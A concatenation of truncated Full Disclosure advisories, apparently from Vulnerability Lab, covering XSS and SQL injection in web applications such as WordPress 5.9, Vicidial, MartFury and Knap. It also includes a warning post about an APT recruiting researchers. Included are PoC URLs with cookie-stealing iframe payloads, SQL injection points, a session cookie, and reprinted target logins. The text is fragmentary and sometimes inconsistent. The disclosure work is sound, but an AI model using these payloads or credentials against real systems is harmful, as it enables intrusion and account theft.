The cross site scripting vulnerabilities are located in the `date_created`, `date_from`, `date_to` and `created_at` parameters of the `filter` web module. The injection point is the parameter value and the execution occurs in the filter module, which reflects the submitted value. The request method to inject the malicious script code is GET and the attack vector is non-persistent on the client side.

Successful exploitation of the vulnerabilities results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] GET

Vulnerable Module(s):
[+] ./orders/myOrders
[+] ./auctions/myAuctions/status/active
[+] ./auctions/myAuctions/status/loose
[+] ./posts/manage
[+] ./news/manage
[+] ./tickets/manage
[+] ./auctions/manage
[+] ./backend/mailingLog/manage

Vulnerable Parameter(s):
[+] date_created
[+] date_from
[+] date_to
[+] created_at

Affected Module(s):
[+] Filter

Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerabilities can be exploited by remote attackers without an account and with low user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.

Exploitation: Payload
">

Exploitation: PoC (Role: Member)
https://bid-auction.localhost:8080/orders/myOrders?order_number=1&created_at=%22%3E%3Ciframe+src%3Devil.source+onload%3Dalert%28document.cookie%29%3E&status=0&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=test1&name=test2&date_from=";>
https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&date_from=%22%3E%3Ciframe+src%3Devil.source+onload&date_to=b&auction_type_id=&category_id=&status=&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/active?auction_number=1&name=a&date_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&date_from=a&date_to=%22%3E%3Ciframe+src%3Devil.source+onload&auction_type_id=&category_id=&status=&but_filter=Filter
https://bid-auction.localhost:8080/auctions/myAuctions/status/loose?auction_number=1&name=a&date_
[FD] North Korean APT Attacks Security Researchers in Social Media 2022
Hello Security Researchers,

our independent vulnerability laboratory team would like to inform the public security research community & whitehats about an incident with the North Korean APT targeting security researchers. As of today a new campaign has been started by the North Korean APT in connection with some Indian affiliates. The campaign targets only security researchers on social media. In most cases the researcher receives a contact request and then a private message, or the message is sent directly to the pages he manages, multiple times. The message includes the following text:

--- English Version
I am a criminal data collection company representing Chinese law enforcement agencies. These fraudulent sites are deceiving many people in China. I need to bring the data to China to sue the site owner. Chinese law enforcement agencies have no law enforcement powers where the servers of this website are located. Therefore, we can only turn to foreign hackers for help at a high cost. Crack the database management authority of the website and download me all the data in the database. You will receive the payment in USDT after I receive the data verification.

--- German Version (translated to English)
I am a criminal data collection company representing Chinese law enforcement agencies. These fraudulent sites deceive many people in China. I have to bring the data to China to sue the website owner. Chinese law enforcement agencies have no enforcement powers where the servers of this website are located. Therefore we can only turn to foreign hackers, at high cost, for help. Crack the website's database administration authority and download all the data in the database for me. You will receive payment in USDT after I have received the data verification.

1: 30,000 USDT
https://gec.green-entrepreneurship.cc/login_zh.html?0.8208984571383173
username: 15289618853
password: qq308830

2: 30,000 USDT
https://www.cegdex.com/downloadMobile.html
username: asdfhuhu
password: asdfhuhu
transaction password: 852369
Phone number: +12098746325
SMS verification code platform: https://mianfeijiema.com/sms/12098746325

3: 40,000 USDT
http://ahcprotect.com
username: DD3645450
password: 33
http://www.ahcgoods.com
username: DD1357619
password: 33

4: 200,000 USDT
https://www.youlucky.biz/

After that text, the APT lists in the message all targets they want to infiltrate or heist. The main target is the olympia service of a provider. The second targets are financially motivated, in connection with SMS verification bypass. This is mainly used to heist cryptocurrency or financial platforms. The impact of the attack does not yet show what their targets are, because this is a high espionage tactic. The APT searched for pro hackers and researchers with a high level of reputation on social media.

1. The attackers want to compromise the researcher by extortion or identity compromise.
2. The attackers want the hacker and researcher community to attack the targets listed above without any purpose, as a service. Meaning you just do what they tell you, to drive up traffic or to hide their traces.
3. They are really asking for this service to receive access to olympia service data, or to financial services they have already gained access to and need to bypass a specific mechanism like SMS verification.

The motivation and the impact of the attack are not clearly visible ... we would like to inform everybody about it via the mailing list to be aware of the North Korean APT.

Risks that come along with the attack:
Phishing (Links, Sites & Emails)
Downgrade Attacks (Redirect & SSL Downgrade)
Malware Infection (2021 Q1 NET DLL Malware)
Identity Compromise (2021 Security Researchers)
Exploit Development (2021 Chrome Scenario)
Attacks against 3rd Party Service (Chain Exploitation)

Pictures:
https://ibb.co/1ffY1vb
https://ibb.co/9cmhD3z
https://ibb.co/3YVmMXX
https://ibb.co/m6s4R2G
https://ibb.co/XJSsWDG
https://ibb.co/JcDTDZ7

--
VULNERABILITY LABORATORY (VULNERABILITY LAB)
RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE

___
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
[FD] Car Portal Template - (Search) Persistent Web Vulnerability
Document Title:
===============
Car Portal Template - (Search) Persistent Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2299

Release Date:
=============
2022-02-08

Vulnerability Laboratory ID (VL-ID):
====================================
2299

Common Vulnerability Scoring System:
====================================
5.6

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Advanced web solution for creating multi-user car classifieds and auto portal websites. The software has many different features both for the administrators to manage the sites and for the users, like functionality for car dealers to create and manage their own micro site, email alerts to notify users when new cars meeting their search criteria are listed, saving car listings, recommending them to friends, sharing the listings on social networks, multi-language support and many others.

(Copy of the Homepage: https://www.netartmedia.net/pricing#car-portal )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a non-persistent POST injection vulnerability in the Car Portal Template PHP Script.

Affected Product(s):
====================
NetArt Media
Product: Car Portal Template PHP Script (v2021) - CMS (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-01: Researcher Notification & Coordination (Security Researcher)
2021-09-02: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-02-08: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Pre Auth (No Privileges or Session)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A non-persistent POST injection web vulnerability has been discovered in the official Car Portal Template PHP Script. The vulnerability allows remote attackers to inject malicious script code in POST method requests to compromise user session data or to manipulate application contents for clients.

The cross site scripting vulnerability is located in the `username`, `user_first_name`, `user_last_name`, `variant`, `power` and `mileage` parameters of the `index search` module. Remote attackers without privileged access are able to inject their own malicious script code into the search input fields of the index module POST request. The execution takes place in the results page of the search after submission via POST.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Request method(s):
[+] POST

Vulnerable File(s):
[+] index.php

Vulnerable Input(s):
[+] Trim
[+] Power
[+] Mileage
[+] First name
[+] Last name
[+] Username

Vulnerable Parameter(s):
[+] username
[+] user_first_name
[+] user_last_name
[+] variant
[+] power
[+] mileage

Proof of Concept (PoC):
=======================
The client-side POST injection web vulnerability can be exploited by remote attackers without an account and with low or medium user interaction. For security demonstration or to reproduce the cross site scripting web vulnerability follow the provided information and steps below to continue.

--- PoC Session Logs (POST) ---
https://car-portal-template.localhost:8080/cars2/index.php
Host: car-portal-template.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 878
Origin: https://car-portal-template.localhost:8080
Connection: keep-alive
Referer: https://car-portal-template.localhost:8080/cars2/index.php
Cookie: language=en; PHPSESSID=23d238178bfb19f9bd93f25f1b465822
ad_type=&selected_package=0&property_type=1,1&property_zip=&price=,&mod=sell&lang=en&Step=2&current_type=1
&type=1&username=">&password=">
&user_first_name=">&user_last_name=">
&user_email=t...@aol.de&user_phone=&car_make=Aixam&car_model=505&variant=">
&year=2004&location1=18&location2=-1&level_location=&post_location=18
&power=">&mileage=">
&transmission=M_MANUAL&fuel_type=M_PETROL&exterior_color=M_WHITE&description=
-
POST: HTTP/2.0 200 OK
server: Apache
set-cookie: language=en; expires=Tue; Max-Age=31536000
vary: Accept-Encoding
content-encoding: gzip
content-length: 6974
content-t
[FD] Wordpress v5.9 - Reflected Cross Site Scripting Web Vulnerability
Document Title:
===============
Wordpress v5.9 - Reflected Cross Site Scripting Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2316

Release Date:
=============
2022-02-09

Vulnerability Laboratory ID (VL-ID):
====================================
2316

Common Vulnerability Scoring System:
====================================
4.2

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
WordPress (WP, WordPress.org) is a free and open-source content management system (CMS) written in PHP and paired with a MySQL or MariaDB database. Features include a plugin architecture and a template system, referred to within WordPress as Themes. WordPress was originally created as a blog-publishing system but has evolved to support other web content types including more traditional mailing lists and forums, media galleries, membership sites, learning management systems (LMS) and online stores. One of the most popular content management system solutions in use, WordPress is used by 42.8% of the top 10 million websites as of October 2021.

(Copy of the Homepage: wikipedia.com)

Abstract Advisory Information:
==============================
An independent vulnerability researcher discovered a reflected cross site web vulnerability in the official Wordpress v5.9 framework.

Affected Product(s):
====================
Wordpress.org
Product: Wordpress v5.9 - Blog (PHP) (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-02-09: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
The reflected xss can be exploited when a user with the AUTHOR or CONTRIBUTOR role adds a javascript payload in the Post's Excerpt function; whenever a user wants to use the Add Block function in their post or page, the xss will be executed.

Also the post and page editor allows executing the xss payload directly just by copying and pasting the malicious javascript.

Proof of Concept (PoC):
=======================
The non-persistent cross site scripting web vulnerability can be exploited by remote attackers with a contributor or author user account (authenticated) and with low user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.

Note: Cross-Site Scripting will be executed in all the sections where the editor and search engine of the add block function can be used, as well as in the post and page section of the editor with the copy and paste function.

POC1: The malicious Excerpt will be executed in the post and page sections at the moment you want to use the add new block function and type some name in the search engine of the add block function, reflecting it in all the wordpress editor sections.
1.) Login with user author or contributor
2.) Add new post
3.) Add Block Post Excerpt
4.) Add malicious code in the Extract function ()
5.) Replicated

POC2: IN BLOCK FUNCTION
1.) Login with user author
2.) Add new post
3.) Publish Post
4.) Add malicious code in the Extract function ()
5.) In the post editor add a new block
6.) Search for something in the block search engine
7.) Replicated

POC3: XSS IN POST & PAGE EDITOR
1.) Login with user author or contributor
2.) Add new post
3.) Copy & Paste () in editor
4.) Replicated

Firefox Payload:

Chrome Payload:

XSS Poc Image:
https://i.imgur.com/WiaEUEE.png
https://i.imgur.com/voJptm0.png

Poc Video
https://www.youtube.com/watch?v=hUY00Vg6wOk

Solution - Fix & Patch:
=======================
The vulnerability can be resolved by an encode and secure parse / escape of the inputs. In a second step the output location where the execution occurs needs to be sanitized.

Note: Wordpress is informed about the issue and is in progress to develop an update. The researcher noted to publicly disclose the finding immediately.

Until the patch is available, ensure that only trusted persons have access to contributor or author roles. As an alternative it is possible to deactivate the accounts until a patch is available.

Credits & Authors:
==================
TaurusOmar (@TaurusOmar_) - https://www.vulnerability-lab.com/show.php?user=TaurusOmar

Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties
[FD] Vicidial v2.14-783a - (DB) SQL Injection Web Vulnerability
Document Title:
===============
Vicidial v2.14-783a - (DB) SQL Injection Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2312

Release Date:
=============
2022-02-17

Vulnerability Laboratory ID (VL-ID):
====================================
2312

Common Vulnerability Scoring System:
====================================
7.3

Vulnerability Class:
====================
SQL Injection

Current Estimated Price:
========================
1.000€ - 2.000€

Product & Service Introduction:
===============================
Vicidial is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well. The agent interface is an interactive set of web pages that work through a web browser to give real-time information and functionality with nothing more than an internet browser on the client computer. The management interface is also web-based and offers the ability to view many real-time and summary reports as well as many detailed campaign and agent options and settings. VICIDIAL can function as an ACD for inbound calls or for Closer calls coming from VICIDIAL outbound fronters and even allows for remote agents logging in from remote locations as well as remote agents that may only have a phone. There are currently over 24,000 installations of VICIDIAL in production in over 100 countries around the world, several with over 300 agent seats and many with multiple locations.

(Copy of the Homepage: https://www.vicidial.org/vicidial.php )
(Download: https://www.vicidial.org/vicidial.php )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a sql-injection web vulnerability in the Vicidial v2.14-783a web-application.

Affected Product(s):
====================
Vicidial Group
Product: Ametys v4.4.1 - Content Management System (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-01-02: Researcher Notification & Coordination (Security Researcher)
2022-01-03: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-02-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
High

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
No User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A remote sql injection web vulnerability has been discovered in the official Vicidial v2.14-783a web-application. The vulnerability allows remote attackers to execute their own sql commands to compromise the web-application or connected dbms.

The vulnerability is located in the `DB` parameter of the `AST_IVRstats.php`, `AST_LISTS_pass_report.php`, `AST_usergroup_login_report.php` and `admin_lists_custom.php` files. Remote attackers are able to execute sql commands by injection of malicious statements via GET method request by the DB parameter. The security risk of the sql injection vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 7.1.

Exploitation of the remote sql injection web vulnerabilities requires no user interaction but an agent or moderator web-application user account. Successful exploitation of the remote sql injection results in database management system, web-server and web-application compromise.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] AST_IVRstats.php
[+] AST_LISTS_pass_report.php
[+] AST_usergroup_login_report.php
[+] admin_lists_custom.php

Vulnerable Parameter(s):
[+] DB

Proof of Concept (PoC):
=======================
The remote sql-injection web vulnerability can be exploited by a privileged user with agent or manager access without user interaction. For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.

PoC: Exploitation
https://vicidial.localhost:8080/vicidial/AST_IVRstats.php?DB=[SQL-INJECTION!]&type=inbound&query_date=+00%3A00%3A00&end_date=+23%3A59%3A59&query_date_D=&query_date_T=00%3A00%3A00&end_date_D=&end_date_T=23%3A59%3A59
https://vicidial.localhost:8080/vicidial/AST_LISTS_pass_report.php?DB=[SQL-INJECTION!]&use_lists=&report_display_type=HTML&SUBMIT=SUBMIT
https://vicidial.localhost:8080/vicidial/AST_usergroup_login_report.php?DB=[SQL-INJECTION!]&type=&user_group[]=001&report_display_type=HTML&SUBMIT=SUBMIT
https://vicidial.localhost:8080/vicidial/admin_lists_custom.php?action=DELETE_CUSTOM_FIELD_CONFIRMATION&list_id=108&fie
[FD] MartFury Marketplace - Cross Site Scripting Vulnerability
Document Title:
===============
MartFury Marketplace - Cross Site Scripting Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2282

Release Date:
=============
2022-02-17

Vulnerability Laboratory ID (VL-ID):
====================================
2282

Common Vulnerability Scoring System:
====================================
5.5

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Martfury is a clean & modern Laravel Ecommerce System for multipurpose online stores. With a clean and trendy design, Martfury will make your online store look more impressive and attractive to viewers. It helps increase the conversion rate so that your customers buy products quickly. Designed on the grid system, your site will look sharp on all screens. The mobile optimized design based on user experience brings the best shopping experience for your customers.

(Copy of the Homepage: https://codecanyon.net/item/martfury-multipurpose-laravel-ecommerce-system/29925223 )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site scripting web vulnerability in the official MartFury online service web-application.

Affected Product(s):
====================
Botble
Product: MartFury - Online Service (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-08-22: Researcher Notification & Coordination (Security Researcher)
2021-08-23: Vendor Notification (Security Department)
2021-**-**: Vendor Response/Feedback (Security Department)
2021-**-**: Vendor Fix/Patch (Service Developer Team)
2021-**-**: Security Acknowledgements (Security Department)
2022-02-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent cross site scripting web vulnerability has been discovered in the official MartFury online service web-application. The web vulnerability allows remote attackers to inject their own malicious script code with persistent attack vector to compromise browser to web-application requests from the application-side.

The vulnerability is located in the product description and name parameters of the create function in the products module (martfury dashboard). Remote attackers with privileged account access (user to vendor by product) are able to inject their own malicious products. After a product is saved, any customer that buys the article executes the malicious inject payload on events like favorite & compare. On the request a confirm information is displayed on the top left of the application that executes the script code with persistent attack vector. The request method to inject is post and the attack vector is persistent, located on the application-side.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Status Notification

Vulnerable Input(s):
[+] Name
[+] Description

Vulnerable Parameter(s):
[+] name
[+] description

Affected Module(s):
[+] Compare
[+] Favorite

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Register an account
2. Move to vendor dashboard
3. Register an account
4. Go to products and create a product
5. Inject payload to name and description
6. Save by submit via post method request
7. Preview the public product
8. Click compare or the favorites button
9. Status displays and executes the malicious script code with persistent attack vector
10. Successful reproduce of the persistent web vulnerability!

Exploitation: Payload

--- PoC Session Logs (POST) (Inject) [Name & Description] ---
https://martfury.localhost:8080/vendor/products/create
Host: martfury.localhost:8080
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: multipart/form-data; boundary=---312580254331809165411596595054
Content-Length: 4034
Origin: https://martf
[FD] Knap (APL) v3.1.3 - Persistent Cross Site Vulnerability
Document Title:
===============
Knap (APL) v3.1.3 - Persistent Cross Site Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2307

Release Date:
=============
2022-10-10

Vulnerability Laboratory ID (VL-ID):
====================================
2307

Common Vulnerability Scoring System:
====================================
5.7

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Knap is an advanced User Management software written in Laravel 5.4 (PHP Framework) that allows the admin to manage users.

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site web vulnerability in the Knap Advanced PHP Login v3.1.3 user management web-application.

Affected Product(s):
====================
ajay138
Product: Knap Advanced PHP Login v3.1.3 - User Management (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2021-09-03: Researcher Notification & Coordination (Security Researcher)
2021-09-04: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-10-10: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (User Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the Knap Advanced PHP Login v3.1.3 user management web-application. The vulnerability allows remote attackers to inject their own malicious script code with persistent attack vector to compromise browser to web-application requests from the application-side.

The persistent cross site web vulnerability is located in the name parameter of the Profile Account - Account Information module. Remote attackers with low privileged user accounts are able to inject their own malicious script code as name to provoke an execution of the malicious content inside the users and activity log backend modules. The request method to inject is post. The injection points are the user create or update, and the execution of the malicious script code occurs in the activity log and users listings.

Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external redirects to malicious sources and persistent manipulation of affected application modules.

Request Method(s):
[+] POST

Vulnerable Module(s):
[+] Register (Site)
[+] Update (Account Information)

Vulnerable Input(s):
[+] Name

Vulnerable Parameter(s):
[+] name

Affected Module(s):
[+] ./users
[+] ./activity

Proof of Concept (PoC):
=======================
The persistent input validation web vulnerability can be exploited by remote attackers with a low privileged user account and low user interaction. For security demonstration or to reproduce the persistent cross site web vulnerability follow the provided information and steps below to continue.

Manual steps to reproduce the vulnerability ...
1. Register as user or get registered by the admin
2. Start your web browser and a session tamper or debug tool
3. Open the My Profile menu with the Profile Account information section
4. Change the name input to your script code test payload and save via submit (post)
Note: The injected payload executes successfully in the users list (backend) and within the activity log on history (backend) on preview by admins or mods
5. Successful reproduce of the persistent cross site scripting web vulnerability!

--- PoC Session Logs (POST) [Inject via User Role by Profile Account Update|Create] ---
https://knap.froid.works/profiles/102
Host: knap.froid.works
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---73425417436906186553080920069
Content-Length: 29455
Origin: https://knap.froid.works
Connection: keep-alive
Referer: https://knap.froid.works/profile-edit
Cookie: laravel_session=eyJpdiI6Ikt4Zmd3WDVSeThObVlvbnZld1JadWc9PSIsInZhbHVlIjoiN3pubk1YaVwvaWp6aWF2QlNwb3l2T2h5MzdHZjJUd0Y2em1mUXE4Q1wvZHhnbkhwUW1ZaDU3aytaWFNURk5pc1M4IiwibWFjIjoiM2UwMTg0MGQ0M2VjMDk0YTVkN2M0ZGVjOWM5NmI1NDMzYzUxODU5ZmVkNmNmZDJlMTc5ZmVlYThiNTlkODIxZCJ9
0=_&1=t&2=o&3=k&4=e&5=n&6==&7=S&8=B&9=0&10=q&11=T&12=5&13=b&14=O&15=B&16=k&17=R&18=w&19=d&20=n&21=U&22=J&23=M&24=A&25=z&26=g&27=B &2
[FD] Vicidial v2.14-783a - Multiple XSS Web Vulnerabilities
Document Title:
===============
Vicidial v2.14-783a - Multiple XSS Web Vulnerabilities

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2311

Release Date:
=============
2022-10-11

Vulnerability Laboratory ID (VL-ID):
====================================
2311

Common Vulnerability Scoring System:
====================================
5.2

Vulnerability Class:
====================
Cross Site Scripting - Non Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
VICIDIAL is a software suite that is designed to interact with the Asterisk Open-Source PBX Phone system to act as a complete inbound/outbound contact center suite with inbound email support as well. The agent interface is an interactive set of web pages that work through a web browser to give real-time information and functionality with nothing more than an internet browser on the client computer. The management interface is also web-based and offers the ability to view many real-time and summary reports as well as many detailed campaign and agent options and settings. VICIDIAL can function as an ACD for inbound calls or for Closer calls coming from VICIDIAL outbound fronters and even allows for remote agents logging in from remote locations as well as remote agents that may only have a phone. There are currently over 24,000 installations of VICIDIAL in production in over 100 countries around the world, several with over 300 agent seats and many with multiple locations.

(Copy of the Homepage: https://www.vicidial.org/vicidial.php )
(Download: https://www.vicidial.org/vicidial.php )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered multiple client-side cross site scripting vulnerabilities in the VICIDIAL v2.14-783a web-application.

Affected Product(s):
====================
Vicidial Group
Product: Vicidial v2.14-783a - (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-01-15: Researcher Notification & Coordination (Security Researcher)
2022-01-16: Vendor Notification (Security Department)
2022-**-**: Vendor Response/Feedback (Security Department)
2022-**-**: Vendor Fix/Patch (Service Developer Team)
2022-**-**: Security Acknowledgements (Security Department)
2022-10-11: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Pre Auth (No Privileges or Session)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Responsible Disclosure

Technical Details & Description:
================================
Multiple non-persistent cross site scripting web vulnerabilities have been discovered in the official VICIDIAL v2.14-783a web-application. The vulnerability allows remote attackers to inject malicious script code in post method requests to compromise user session data or to manipulate application contents for clients.

The vulnerabilities are located in the `end_date`, `query_date`, `shift`, `type`, `use_lists`, `search_archived_data`, `start_hour`, `end_hour`, `stage`, `agent`, `user` and `db` parameters of the vulnerable `AST_IVRstats.php`, `AST_LISTS_pass_report.php`, `AST_user_group_hourly_detail.php`, `AST_agent_time_sheet.php`, `AST_agent_days_detail.php`, `user_status.php`, `admin_lists_custom.php` and `admin.php` files. Remote attackers are able to create specially crafted malicious links to execute client-side script code from the application context. The request method to inject is GET and the attack vector is non-persistent. The identified web vulnerabilities are classic cross site scripting issues.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Request Method(s):
[+] GET

Vulnerable File(s):
[+] AST_IVRstats.php
[+] AST_LISTS_pass_report.php
[+] AST_user_group_hourly_detail.php
[+] AST_agent_time_sheet.php
[+] AST_agent_days_detail.php
[+] user_status.php
[+] admin_lists_custom.php
[+] admin.php

Vulnerable Parameter(s):
[+] end_date
[+] query_date
[+] shift
[+] type
[+] use_lists
[+] search_archived_data
[+] start_hour
[+] end_hour
[+] stage
[+] agent
[+] user
[+] db

Affected Module(s):
[+] Backend Administration Web UI (Agents, Managers & Admins)

Proof of Concept (PoC):
=======================
The client-side post inject web vulnerability can be exploited by remote attackers without account and with low or medium user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.

Vulne
[FD] Stripe Green Downloads 2.03 - Cross Site Scripting Web Vulnerability
Document Title:
===============
Stripe Green Downloads 2.03 - Cross Site Web Vulnerability

References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2287

Release Date:
=============
2022-10-17

Vulnerability Laboratory ID (VL-ID):
====================================
2287

Common Vulnerability Scoring System:
====================================
5.2

Vulnerability Class:
====================
Cross Site Scripting - Persistent

Current Estimated Price:
========================
500€ - 1.000€

Product & Service Introduction:
===============================
Easily configure the plugin to accept payments through Stripe with Strong Customer Authentication. Easily style the payment button with overall styling settings. Tons of options for any needs. Host files in a secured folder, Media Library (WordPress plugin only) or anywhere on your server. Send custom email notifications to buyer and administrator after successful payments. Collect statistics of button impressions, payments and downloads for any file for any period.

(Copy of the Homepage: https://halfdata.com/green-downloads/stripe/ )

Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent cross site vulnerability in the Stripe Green Downloads web-application and wordpress plugin.

Affected Product(s):
====================
halfdata
Product: Stripe Green Downloads - Admin Panel v1.0 (Web-Application)
Product: Stripe Green Downloads - Wordpress Plugin 2.03 (Web-Application)

Vulnerability Disclosure Timeline:
==================================
2022-10-17: Public Disclosure (Vulnerability Laboratory)

Discovery Status:
=================
Published

Exploitation Technique:
=======================
Remote

Severity Level:
===============
Medium

Authentication Type:
====================
Restricted Authentication (Moderator Privileges)

User Interaction:
=================
Low User Interaction

Disclosure Type:
================
Independent Security Research

Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the Stripe Green Downloads web-application and wordpress plugin v2.03. The vulnerability allows remote attackers to inject their own malicious script code with persistent attack vector to compromise browser to web-application requests from the application-side.

The persistent xss web vulnerability is located in the `Label`, `Processing label` and `Download label` input fields of the `Green Downloads - Settings - Button` module. Attackers with local privileges to access the panel are able to inject their own malicious script code into the button, which executes the content in the preview context. The request method to inject is post and the attack vector is persistent on the application-side. The vulnerable parameters are `idcore-button-label`, `idcore-button-label-processing` and `idcore-button-label-download`.

Successful exploitation of the vulnerability results in session hijacking, non-persistent phishing attacks, non-persistent external redirects to malicious sources and non-persistent manipulation of affected application modules.

Vulnerable Module(s):
[+] Green Downloads - Settings - Button

Vulnerable Input(s):
[+] Label
[+] Processing label
[+] Download label

Vulnerable Parameter(s):
[+] idcore-button-label
[+] idcore-button-label-processing
[+] idcore-button-label-download

Affected Module(s):
[+] Preview (/stripe/script/?page=idcore-settings)

Proof of Concept (PoC):
=======================
The client-side cross site scripting web vulnerability can be exploited by remote attackers with a privileged account and with low user interaction. For security demonstration or to reproduce the cross site web vulnerability follow the provided information and steps below to continue.

Vulnerable Source: /stripe/script/?page=idcore-settings
Preview:
.idcore-preview-button{font-family:'Strait','arial';font-size:20px;color:#ff;font-weight:normal;font-style:normal;
text-decoration:none;text-transform:uppercase;width:250px;height:56px;line-height:56px;background-color:#d4150b;
background-image:linear-gradient(to bottom,rgba(255,255,255,.05) 0,rgba(255,255,255,.05) 50%,rgba(0,0,0,.05) 51%,rgba(0,0,0,.05) 100%);
border-width:1px;border-style:solid;border-color:#d4150b;border-radius:3px;box-shadow: 2px 2px 0px 0px rgba(68, 68, 68, 0.2);}
Download Now!>"

--- PoC Session Logs (POST) ---
https://green-downloads.localhost:8080/green-downloads/demo/stripe/script/ajax.php
Host: green-downloads.localhost:8080
Accept: */*
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
